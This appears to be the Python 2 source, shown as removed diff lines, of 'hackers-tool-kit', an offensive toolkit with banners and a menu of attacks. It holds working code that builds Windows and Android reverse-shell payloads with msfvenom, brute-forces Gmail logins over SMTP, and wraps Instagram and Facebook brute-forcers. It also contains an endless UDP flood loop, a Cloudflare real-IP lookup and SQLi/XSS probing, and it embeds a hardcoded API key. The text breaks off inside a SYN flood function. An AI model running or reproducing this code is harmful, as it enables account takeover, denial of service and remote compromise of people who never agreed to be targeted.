██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ -▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ -░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ -░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ - ▒ ░░▒░▒ ▒▒ ▓▒█░░ ░▒ ▒ ░▒ ▒▒ ▓▒░░ ▒░ ░ ▒▒▓ ▒ - ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ - ░ ░░ ░ ░ ▒ ░ ░ ░░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ - ░ ░ - - -""" -#this is the loading screen \ the imports START# -#----------------------------------------------# -import os -print "Starting hackers-tool-kit... [ * ]-[0%]" -import platform -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[5%]" -import webbrowser -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[9%]" -import hashlib -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[14%]" -import subprocess -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[19%]" -import zipfile -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[23%]" -import colorama -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[25%]" -from modules import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[26%]" -import modules.colors -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[27%]" -import builtwith -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[29%]" -from urllib2 import urlopen -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[31%]" -from urllib2 import URLError -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[34%]" -from urllib2 import HTTPError -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[38%]" -from urllib import urlencode -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[39%]" -from plugins.DNSDumpsterAPI import DNSDumpsterAPI -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[41%]" -import whois -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[45%]" -import json -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[47%]" -from urlparse import urlparse -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[50%]" -from re import search, sub -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[55%]" -import cookielib -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[56%]" -import socket -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[59%]" -from scapy.all import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[60%]" -from threading import Thread, active_count -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[63%]" -import random -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[67%]" -import string -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[70%]" -import signal -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[73%]" -import ssl -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[79%]" -import argparse -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[83%]" -import sys -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[86%]" -import socks -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[89%]" -import mechanize -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[90%]" -import requests -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[94%]" -import time -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[96%]" -from datetime import datetime -now = datetime.now() -hour = now.hour -minute = now.minute -day = now.day -month = now.month -year = now.year -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[99%]" -sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) -Gb = random._urandom(20000) -bytes = random._urandom(20000) -Kb = random._urandom(20000) -#COLOR VARIABLES START# -#---------------------# -r = '\033[31m' -W = '\033[90m' -R = '\033[91m' -N = '\033[0m' -G = '\033[92m' -B = '\033[94m' -Y = '\033[93m' -LB = '\033[1;36m' -P = '\033[95m' -Bl = '\033[30m' -O = '\033[33m' -p = '\033[35m' -#-------------------# -#COLOR VARIABLES END# - -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[100%] \033[92m READY\033[0m" -os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @unkn0wn_bali\a'") -os.system("service tor start") -os.system("service postgresql start") -os.system("clear") -#----------------------------------------------# -#this is the loading screen \ the imports END# - - -#MAIN STARTING BANNER START# -#--------------------------# -def mainbanner1(): - os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") - print N+"""\033[34m - .............. \033[0mtype ? for help\033[34m - ..,;:ccc,. - ......''';lxO. - .....''''..........,:ld; - .';;;:::;,,.x, - ..'''. 0Xxoc:,. ... - .... ,ONkc;,;cokOdc',. - . OMo ':ddo. - dMc :OO; - 0M. .:o. - ;Wd - ;XO, \033[93mCreated By @tuf_unkn0wn On Instagram\033[34m - ,d0Odlc;,.. - ..',;:cdOOd::,. - .:d;.':;. - 'd, .' - ;l .. - .o - c - .' - .\033[92m - ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ - ██ ██ ▀▀▀██▀▀▀ ██ ██▀ - ██ ██ ██ ██▄██ - ████████ ██ █████ - ██ ██ █████ ██ █████ ██ ██▄ - ██ ██ ██ ██ ██▄ - ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m - ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ - ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ - ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ - ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - """.decode('utf-8') -def mainbanner2(): - print """\033[92m - ▄█ ▄█ ▄█ - ███ ███ ███ - ███▌ ███▌ ███▌ - ███▌ ███▌ ███▌ - ███▌ ███▌ ███▌ - ███ ███ ███ - ███ ███ ███ - █▀ █▀ █▀ - - ┬ ┬┌─┐┌─┐┬┌─┌─┐┬─┐┌─┐ - ├─┤├─┤│ ├┴┐├┤ ├┬┘└─┐\033[90m - ┴ ┴┴ ┴└─┘┴ ┴└─┘┴└─└─┘ - ┌┬┐┌─┐┌─┐┬ ┬┌─┬┌┬┐\033[92m - │ │ ││ ││───├┴┐│ │ - ┴ └─┘└─┘┴─┘ ┴ ┴┴ ┴ \033[0m -Created By @tuf_unkn0wn - """.decode('utf-8') -def mainbanner3(): - print """\033[91m - ▒\033[90m██ ██\033[91m▒ ▒\033[90m██ ██\033[91m▒ - ▒▒ \033[90m█ █ \033[91m▒░ ▒▒ \033[90m█ █ \033[91m▒░ - ░░ \033[90m█ \033[91m░ ░░ \033[90m█ \033[91m░ - ░ \033[90m█ █ \033[91m▒ ░ \033[90m█ █ \033[91m▒ - ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ - ▒▒ ░ ░▓ ░ ▒▒ ░ ░▓ ░ - ░░ ░▒ ░ ░░ ░▒ ░ - ░ ░ ░ ░ - ░ ░ ░ ░ - \033[90m - - ████████████████████ - ██ ██\033[91m - ▒▒ ▒▒ - ░░ ░░ - ░ ░ - ░ ░\033[0m - -888 888 88888888888 888 d8P -888 888 888 888 d8P -888 888 888 888 d8P \033[1;36m -8888888888 888 888d88K -888 888 888 8888888b\033[0m -888 888 888888 888 888888 888 Y88b -888 888 888 888 Y88b -888 888 888 888 Y88b - Created By @tuf_unkn0wn On Instagram - """.decode('utf-8') -def mainbanner4(): - print P+""" - .S S. sdSS_SSSSSSbs .S S. - .SS SS. YSSS~S%SSSSSP .SS SS. - S%S S%S S%S S%S S&S - S%S S%S S%S S%S d*S - S%S SSSS%S S&S S&S .S*S - S&S SSS&S S&S S&S_sdSSS - S&S S&S S&S S&S~YSSY%b - S&S S&S S&S S&S `S% - S*S S*S S*S S*S S% - S*S S*S S*S S*S n& - S*S S*S S*S S*S wS& - SSS S*S S*S S*S 0 SS - h SP SP SP n - a Y Y Y k - c n - k e r s - t o o l - k i t by @tuf_u\033[0m - """.decode('utf-8') -def mainbanner5(): - print R+""" - ██▀███ ▄▄▄ ▒███████▒ ▒█████ ██▀███ - ▓██ ▒ ██▒▒████▄ ▒ ▒ ▒ ▄▀░▒██▒ ██▒▓██ ▒ ██▒ - ▓██ ░▄█ ▒▒██ ▀█▄ ░ ▒ ▄▀▒░ ▒██░ ██▒▓██ ░▄█ ▒ - ▒██▀▀█▄ ░██▄▄▄▄██ ▄▀▒ ░▒██ ██░▒██▀▀█▄ - ░██▓ ▒██▒ ▓█ ▓██▒▒███████▒░ ████▓▒░░██▓ ▒██▒ - ░ ▒▓ ░▒▓░ ▒▒ ▓▒█░░▒▒ ▓░▒░▒░ ▒░▒░▒░ ░ ▒▓ ░▒▓░ - ░▒ ░ ▒░ ▒ ▒▒ ░░░▒ ▒ ░ ▒ ░ ▒ ▒░ ░▒ ░ ▒░ - ░░ ░ ░ ▒ ░ ░ ░ ░ ░░ ░ ░ ▒ ░░ ░ - ░ ░ ░ ░ ░ ░ ░ ░ - ░\033[0m - .,,,,,,,,,,.,,,.....,........................... - ...,...,....,.,..,......,,,,.......,.,,,,,,,.,,, - ..,......,.....,,.,........,,...........,,.,.... - ...,.,,.,....,,,,..,..,,,,,,......,,.,...,..../ - ***********************//***/***//**/********** - ****************** ****************** @tuf_unkn0wn - *,*****,*,******** ***,************** - **,,,,,,,,,,,,,,*,,,,, *,,,,,,,,,*,,,,,,,,,** - ,,,,,,,,,,,,,,,,,,,,,,,*,,,,,,,,,,,,,,,,,,,,,,, - ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, - ***********************************************\033[91m - - ▄████▄ █ ██ ▄▄▄█████▓ ██████ - ▒██▀ ▀█ ██ ▓██▒▓ ██▒ ▓▒▒██ ▒ - ▒▓█ ▄ ▓██ ▒██░▒ ▓██░ ▒░░ ▓██▄ - ▒▓▓▄ ▄██▒▓▓█ ░██░░ ▓██▓ ░ ▒ ██▒ - ▒ ▓███▀ ░▒▒█████▓ ▒██▒ ░ ▒██████▒▒ - ░ ░▒ ▒ ░░▒▓▒ ▒ ▒ ▒ ░░ ▒ ▒▓▒ ▒ ░ - ░ ▒ ░░▒░ ░ ░ ░ ░ ░▒ ░ ░ - ░ ░░░ ░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ - ░ \033[0m - """.decode('utf-8') -def mainbanner(): - import random - for x in range(10): - num = random.randint(1,5) - if num == 1: - mainbanner1() - if num == 2: - mainbanner2() - if num == 3: - mainbanner3() - if num == 4: - mainbanner4() - if num == 5: - mainbanner5() -#--------------------------# -#MAIN STARTING BANNER END# - - -#HELP BANNER START# -#-----------------# -def help(): - print B+""" -▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ - ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ - ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ -\033[0m ░ -about : about the creator / me -? : displays this message -clear : clears screen except for banner -clearall: clears everything on screen -exit : exits script -restart : re run hackers-tool-kit -rebootl : reboot whole device -winload : windows reverse_tcp payload -andload : android reverse_tcp payload -connect : connect to a host -command : execute terminal command -msfcon : metasploit console -set : setoolkit console -msfven : msfvenom -gmail : gmail bruteforce -insta : instagram bruteforce -fb : facebook bruteforce -hydra : Black-Hydra bruteforce -medusa : Medusa bruteforce -ipgrab : host to ip address -myip : show your ip -wifite : automated wifi hacker -reaver : reaver automated [ wifi hack ] -aircrack: aircrack-ng automated [ wifi hack ] -mon : put device in monitor mode -monoff : put device out of monitor mode -netdev : find all devices in your network -scannet : scan for networks around you -specnet : scan a specific network -port : scan for ports on a host -info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m -sysinfo : info about your system \033[91m ██ ██\033[0m -msfex : shows all metasploit exploits \033[91m ██ ██\033[0m -msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfall : shows all metasploit modules \033[91m ██ ██\033[0m -udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m -tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m -syn : SYN flood / dos \033[91m █ █\033[0m -slowl : Slow Loris dos \033[91m █ █ \033[0m -ping : pings host \033[91m █ █\033[0m -multih : start a multi handler \033[91m █ █\033[0m -cupp : make wordlists \/ vvvvvvvvv \/ -vdir : view files of a directory -vpn : activate a vpn -vpnoff : stop vpn -pidox : dox website -pingen : Generate a routers default pin -deauth : deauth attack / wifi jammer -macc : changes mac address -macoff : returns mac address to normal Hackers-Tool-Kit -arpspoof: arp spoofing | -sslscan : ssl scan a host ██╗ ██╗ ████████╗ ██╗ ██╗ -payload : make a metasploit payload of your choice ██║ ██║ ╚══██╔══╝ ██║ ██╔╝ -crunch : Make wordlists ███████║\033[91m█████\033[0m╗██║\033[91m█████\033[0m╗█████╔╝ -traff : shows your internet traffic ██╔══██║╚════╝██║╚════╝██╔═██╗ -resa : reset account password ██║ ██║ ██║ ██║ ██╗ -resu : reset unix password ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ -hashid : find the type of hash of a hash | -wafwoof : check a web application for firewall Hackers-Tool-Kit -cloud : cloudflare bypass -brutex : auto bruteforce every service of a host -methelp : show meterpreter help -winbyp : windows defender bypass -exploit : use a metasploit exploit of your choice -phish : phishing automated -datalist: list all hosts & services in the database -msfev : shows all metasploit evasions -upgrade : fully update your linux os -nscript : use a nmap script -sshver : scan for ssh version on a host -chains : browse web anonymous via proxychains [proxychains setup required] -mysqlv : scan for mysql version on a host -terminal: open another new terminal -source : get source code from a website -dirscan : web directory scanner / bruteforce -aserver : start a apache server -run : run a file -\033[91m---------------------------------------------------------------------------------\033[0m - """ -#-----------------# -#HELP BANNER END# - - -#WINDOWS REVERSE TCP PAYLOAD START# -#---------------------------------# -def winload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -#-------------------------------# -#WINDOWS REVERSE TCP PAYLOAD END# - - -#ANDROID REVERSE TCP PAYLOAD START# -#---------------------------------# -def andload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -#-------------------------------# -#ANDROID REVERSE TCP PAYLOAD END# - -#GMAIL BRUTEFORCE START# -#----------------------# -def gmail(): - #!/usr/bin/python - '''create by Ha3MrX''' - - import smtplib - from os import system - - def main(): - print '\033[93m=================================================' - print '\033[91m create by Ha3MrX ' - print '\033[93m=================================================' - print '\033[95m ++++++++++++++++++++ ' - print '\n ' - print '\033[92m _,. ' - print ' ' - print ' ' - print ' HA3MrX ' - print ' _,. ' - print ' ,` -.) ' - print ' ( _/-\\-._ ' - print ' /,|`--._,-^| , ' - print ' \_| |`-._/|| , | ' - print ' | `-, / | / / ' - print ' | || | / / ' - print ' `r-._||/ __ / / ' - print ' __,-<_ )`-/ `./ / ' - print ' \ `--- \ / / / ' - print ' | |./ / ' - print ' / // / ' - print ' \_/ \ |/ / ' - print ' | | _,^- / / ' - print ' | , `` (\/ /_ ' - print ' \,.->._ \X-=/^ ' - print ' ( / `-._//^` ' - print ' `Y-.____(__} ' - print ' | {__) ' - print ' () \033[91m V.1.0 ' - - main() - print '\033[0m[1] start the attack' - print '[2] exit' - option = input('==>') - if option == 1: - file_path = raw_input('path of passwords file :') - else: - system('clear') - exit() - pass_file = open(file_path,'r') - pass_list = pass_file.readlines() - def login(): - i = 0 - user_name = raw_input('target email :') - server = smtplib.SMTP_SSL('smtp.gmail.com', 465) - server.ehlo() - for password in pass_list: - i = i + 1 - print str(i) + '/' + str(len(pass_list)) - try: - server.login(user_name, password) - system('clear') - main() - print '\n' - print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' - break - except smtplib.SMTPAuthenticationError as e: - error = str(e) - if error[14] == '<': - system('clear') - main() - print '[+] this account has been hacked, password :' + password + ' ^_^' - - break - else: - print '[!] password not found => ' + password - login() -#--------------------# -#GMAIL BRUTEFORCE END# - -#PORT SCAN START# -#---------------# -def port(): - n = raw_input("Enter Target: ") - os.system("nmap " + n) -#-------------# -#PORT SCAN END# - -#INSTAGRAM BRUTEFORCE START# -#--------------------------# -def insta(): - insta = raw_input("USERNAME> ") - jl = raw_input("WORDLIST> ") - k = raw_input("THREADS> ") - ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} {1} {2}'.format(insta,jl,k) - os.system(ma) -#------------------------# -#INSTAGRAM BRUTEFORCE END# - -#FACEBOOK BRUTEFORCE START# -#-------------------------# -def fb(): - facebook = raw_input("[EMAIL/ID->]: ") - word = raw_input("[WORDLIST->]: ") - ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) - os.system(ks) -#-----------------------# -#FACEBOOK BRUTEFORCE END# - -#HOST TO IP START# -#----------------# -def ipgrab(): - b = raw_input(Y+'Enter Host:\033[0m ') - ip = socket.gethostbyname(b) - print G+"------------------------\033[0m" - print N+"Host: ", b - print N+"IP: ", ip - print G+"------------------------\033[0m" -#--------------# -#HOST TO IP END# - -#YOUR OWN IP START# -#-----------------# -def myip(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) - print "\n Router IP" - print "----------------------------\033[92m" - os.system('curl "http://myexternalip.com/raw"') - print "\n\033[0m----------------------------" -#---------------# -#YOUR OWN IP END# - - -#AUTOMATED WIFI HACK START# -#-------------------------# -def wifite(): - os.system("wifite") -#-----------------------# -#AUTOMATED WIFI HACK END# - - -#MONITOR MODE START# -#------------------# -def mon(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng start " + i) -#----------------# -#MONITOR MODE END# - - -#DEVICES IN THE NET START# -#------------------------# -def netdev(): - os.system("netdiscover") -#----------------------# -#DEVICES IN THE NET END# - - -#NETS AROUND YOU START# -#-----------------------# -def scannet(): - os.system("iwconfig") - m = raw_input("Select Interface: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - os.system("airodump-ng -w /root/SCAN " + m) - print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" - if j == "n": - os.system("airodump-ng " + m) -#---------------------# -#NETS AROUND YOU END# - - -#INFO SCAN HOST START# -#--------------------# -def info(): - params = [] - # Browser - br = mechanize.Browser() - - # Just some colors and shit - white = '\033[1;97m' - green = '\033[1;32m' - red = '\033[1;31m' - yellow = '\033[1;33m' - end = '\033[1;m' - info = '\033[1;33m[!]\033[1;m' - que = '\033[1;34m[?]\033[1;m' - bad = '\033[1;31m[-]\033[1;m' - good = '\033[1;32m[+]\033[1;m' - run = '\033[1;97m[~]\033[1;m' - - # Cookie Jar - cj = cookielib.LWPCookieJar() - br.set_cookiejar(cj) - - # Browser options - br.set_handle_equiv(True) - br.set_handle_redirect(True) - br.set_handle_referer(True) - br.set_handle_robots(False) - - # Follows refresh 0 but not hangs on refresh > 0 - br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) - br.addheaders = [ - ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] - - - print '''\033[1;31m - _________ __ __ __ - / _____// |________|__| | __ ___________ - \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ - / \| | | | \/ | <\ ___/| | \/ - /_______ /|__| |__| |__|__|_ \\\\___ >__| - \/ \/ \/\033[1;m''' - target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') - if 'http' in target: - parsed_uri = urlparse(target) - domain = '{uri.netloc}'.format(uri=parsed_uri) - else: - domain = target - try: - br.open('http://' + target) - target = 'http://' + target - except: - target = 'https://' + target - - def sqli(url): - print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run - br.open('https://suip.biz/?act=sqlmap') - br.select_form(nr=0) - br.form['url'] = url - req = br.submit() - result = req.read() - match = search(r"---(?s).*---", result) - if match: - print '%s One or more parameters are vulnerable to SQL injection' % good - option = raw_input( - '%s Would you like to see the whole report? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - print '\033[1;31m-\033[1;m' * 40 - print match.group().split('---')[1][:-3] - print '\033[1;31m-\033[1;m' * 40 - else: - print '%s None of parameters is vulnerable to SQL injection' % bad - - - def cms(domain): - try: - result = br.open('https://whatcms.org/?s=' + domain).read() - detect = search(r'class="nowrap" title="[^<]*">', result) - WordPress = False - try: - r = br.open(target + '/robots.txt').read() - if "wp-admin" in str(r): - WordPress = True - except: - pass - if detect: - print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) - detect = detect.group().split('">')[1][:-27] - if 'WordPress' in detect: - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - elif WordPress: - print '%s CMS Detected : WordPress' % info - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - else: - print '%s %s doesn\'t seem to use a CMS' % (info, domain) - except: - pass - - def honeypot(ip_addr): - result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} - honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr - try: - phoney = br.open(honey).read() - if float(phoney) >= 0.0 and float(phoney) <= 0.4: - what = good - else: - what = bad - print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) - except KeyError: - print '\033[1;31m[-]\033[1;m Honeypot prediction failed' - - def whoisIt(url): - who = "" - print '{} Trying to gather whois information for {}'.format(run,url) - try: - who = str(whois.whois(url)).decode() - except Exception: - pass - test = who.lower() - if "whoisguard" in test or "protection" in test or "protected" in test: - print '{} Whois Protection Enabled{}'.format(bad, end) - else: - print '{} Whois information found{}'.format(good, end) - try: - data = json.loads(who) - for key in data.keys(): - print "{} :".format(key.replace("_", " ").title()), - if type(data[key]) == list: - print ", ".join(data[key]) - else: - print "{}".format(data[key]) - except ValueError: - print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) - pass - - def nmap(ip_addr): - port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr - result = br.open(port).read() - result = sub(r'Starting[^<]*\)\.', '', result) - result = sub(r'Service[^<]*seconds', '', result) - result = os.linesep.join([s for s in result.splitlines() if s]) - print result - - def bypass(domain): - post = urlencode({'cfS': domain}) - result = br.open( - 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() - - match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) - if match: - bypass.ip_addr = match.group().split(' ')[1][:-1] - print '%s Real IP Address : %s' % (good, bypass.ip_addr) - - def dnsdump(domain): - res = DNSDumpsterAPI(False).search(domain) - print '\n%s DNS Records' % good - for entry in res['dns_records']['dns']: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - for entry in res['dns_records']['mx']: - print '\n%s MX Records' % good - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n\033[1;32m[+]\033[1;m Host Records (A)' - for entry in res['dns_records']['host']: - if entry['reverse_dns']: - print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) - else: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n%s TXT Records' % good - for entry in res['dns_records']['txt']: - print entry - print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) - - - def fingerprint(ip_addr): - try: - result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() - match = search(r'"os_description": "[^<]*"', result) - if match: - print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) - except: - pass - - - ip_addr = socket.gethostbyname(domain) - print '%s IP Address : %s' % (info, ip_addr) - try: - r = requests.get(target) - header = r.headers['Server'] - if 'cloudflare' in header: - print '%s Cloudflare detected' % bad - bypass(domain) - try: - ip_addr = bypass.ip_addr - except: - pass - else: - print '%s Server: %s' % (info, header) - try: - print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) - except: - pass - try: - r.headers['X-Frame-Options'] - except: - print '%s Clickjacking protection is not in place.' % good - except: - pass - fingerprint(ip_addr) - cms(domain) - try: - honeypot(ip_addr) - except: - pass - print "{}----------------------------------------{}".format(red, end) - whoisIt(domain) - try: - r = br.open(target + '/robots.txt').read() - print '\033[1;31m-\033[1;m' * 40 - print '%s Robots.txt retrieved\n' % good, r - except: - pass - print '\033[1;31m-\033[1;m' * 40 - nmap(ip_addr) - print '\033[1;31m-\033[1;m' * 40 - dnsdump(domain) - os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) - try: - br.open(target) - print '%s Crawling the target for fuzzable URLs' % run - for link in br.links(): - if 'http' in link.url or '=' not in link.url: - pass - else: - url = target + '/' + link.url - params.append(url) - if len(params) == 0: - print '%s No fuzzable URLs found' % bad - quit() - print '%s Found %i fuzzable URLs' % (good, len(params)) - for url in params: - print url - sqli(url) - url = url.replace('=', '') - r = br.open(url).read() - if '' in r: - print '%s One or more parameters are vulnerable to XSS' % good - break - print '%s These are the URLs having parameters:' % good - for url in params: - print url - except: - pass -#------------------# -#INFO SCAN HOST END# - - -#INFO ON YOUR SYSTEM START# -#-------------------------# -def sysinfo(): - os.system("iwconfig") - k = raw_input("Interface: ") - os.system("clear") - os.system("ifconfig") - print "\n" - os.system("iwconfig") - print "\n" - os.system("neofetch") - print "\n" - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) - print "\n Router IP" - print "----------------------------\033[92m" - os.system('curl "http://myexternalip.com/raw"') - print "\n\033[0m----------------------------" - print "\n" - show = 'macchanger -s {0}'.format(k) - os.system(show) -#-----------------------# -#INFO ON YOUR SYSTEM END# - - -#ALL METASPLOIT EXPLOITS START# -#-----------------------------# -def msfex(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show exploits'""") -#---------------------------# -#ALL METASPLOIT EXPLOITS END# - - -#UDP DOS START# -#-------------# -def udp(): - target = raw_input(N+"Target:\033[91m ") - ip = socket.gethostbyname(target) - port = input(N+"Port:\033[91m ") - os.system("service tor restart") - print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) - os.system("sleep 2s") - sent = 0 - print "KILLING %s CONNECTIONS"%(ip) - while True: - sock.sendto(Gb, (ip,port)) - sock.sendto(bytes, (ip,port)) - sock.sendto(Kb, (ip,port)) - sent = sent + 1 - port = port + 1 - print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) - if port == 65534: - port = 1 -#-----------# -#UDP DOS END# - -#TCP FLOOD START# -#---------------# -def tcp(): - print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" - print "\n" - tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") - print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" - os.system("sleep 5") - os.system("python /root/hackers-tool-kit/tools/" + tcp) -#-------------# -#TCP FLOOD END# - - -#SYN FLOOD START# -#---------------# -def syn(): - def randomIP(): - ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) - return ip - - def randInt(): - x = random.randint(1000,9000) - return x - - def SYN_Flood(dstIP,dstPort,counter): - total = 0 - print 